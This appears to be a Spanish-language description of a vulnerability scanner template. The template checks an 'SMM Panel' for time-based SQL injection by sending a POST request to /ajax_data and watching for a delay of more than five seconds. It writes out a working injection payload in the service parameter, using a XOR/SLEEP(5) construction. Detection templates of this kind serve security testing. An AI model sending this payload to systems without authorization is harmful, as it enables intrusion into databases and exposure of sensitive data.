
Plantilla de detección de inyección SQL basada en tiempo para SMM Panel, dirigida al parámetro service_detail mediante solicitudes POST manipuladas a /ajax_data, utilizando el retraso en la respuesta para confirmar la vulnerabilidad.
Detección de Inyección SQL basada en tiempo para SMM Panel
Esta plantilla detecta una vulnerabilidad de Inyección SQL basada en tiempo en el parámetro service_detail del SMM Panel a través de solicitudes HTTP POST a /ajax_data. La explotación puede permitir a atacantes remotos acceder a datos sensibles o escalar privilegios.
La herramienta envía una solicitud POST manipulada:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
Si el tiempo de respuesta es mayor a 5 segundos, indica un endpoint vulnerable.
- Método: POST
- Ruta: {{BaseURL}}/ajax_data
- Encabezados: Content-Type: application/x-www-form-urlencoded
- Cuerpo: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Comparador: duración > 5 segundos
